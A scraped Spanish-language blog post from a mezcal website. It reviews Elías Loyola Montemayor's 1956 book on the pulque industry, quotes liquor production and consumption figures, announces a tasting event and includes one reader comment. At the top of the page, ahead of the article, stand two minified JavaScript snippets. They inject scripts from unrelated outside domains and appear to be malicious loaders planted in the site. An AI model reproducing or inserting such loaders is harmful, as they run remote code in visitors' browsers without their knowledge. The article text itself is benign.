;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 88. Libro sobre pulque…y mezcal

88. Libro sobre pulque…y mezcal

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Hace quince días tuve acceso a una joya bibliográfica de 348 páginas: “La industria del pulque” de Elías Loyola Montemayor, editada por el Departamento de Investigaciones Industriales del Banco de México S.A. en 1956. La nota preliminar dice que el propósito de la obra es “contribuir al conocimiento de la industria pulquera, actividad que tradicionalmente ha sido de singular importancia económica en la parte central del país”.
El autor hace la distinción entre producción industrial y de autoconsumo cuando afirma que muchas familias de la zona magueyera “elaboran pulque para el consumo doméstico sirviéndose de recipientes de barro o de pequeñas tinas de madera”, lo que aún hoy sucede en comunidades del Distrito Federal, Durango, EdoMex, Guerrero, Hidalgo, Jalisco, Michoacán, Morelos, Nuevo León, Oaxaca, Puebla, Querétaro, San Luis Potosí, Tlaxcala y Zacatecas.
El texto incluye información sobre mezcal, como el cuadro estadístico de la “Producción fiscalizada de bebidas alcohólicas 1940-1954”. En 1950 se producían (litros): tequila, 8 927 787; mezcal, 3 714 870; sotol, 321 928; pulque, 216 708 209. En otro cuadro, “Consumo aparente de bebidas alcohólicas en 1953”, nos enteramos que los mexicanos consumieron, entre otras bebidas, las siguientes (litros): cerveza, 573 952 241; pulque, 400 000 000; tequila, 11 170 404; ron, 6 974 530; aguardiente, 4 029 445; mezcal, 3 165 184; aguardiente de uva, 1 386 080; sotol, 372 032. Como se ve, contiene información imprescindible.
Al libro y su tema, el pulque, dedicaré después una columna. Por mientras, quien desee asistir a la “Saboreada comparada de destilados”, acuda el martes 16 a Red Fly a las 20 horas: Orizaba 145, Roma, DF. Saborearemos destilado de pulque, de Hidalgo, a 68º; mezcal de Oaxaca de maguey San Martinero a 54.4º; whisky escocés de Islay a 46º; y ron agrícola de Martinica a 55º.
En esta ocasión hay que confirmar asistencia (info@mezcalestradicionales.com.mx) pues sólo hay 30 lugares; la cuota de recuperación, $200.

http://impreso.milenio.com/node/9008396

Category: Milenio, Publicaciones

one responses

  1. Herasmo dice:

    Me gustaría consultar el libro de Elías Loyola Montemayor que comentas: ¿Sabes en que biblioteca pública podría hacerlo?

    Mil Gracias

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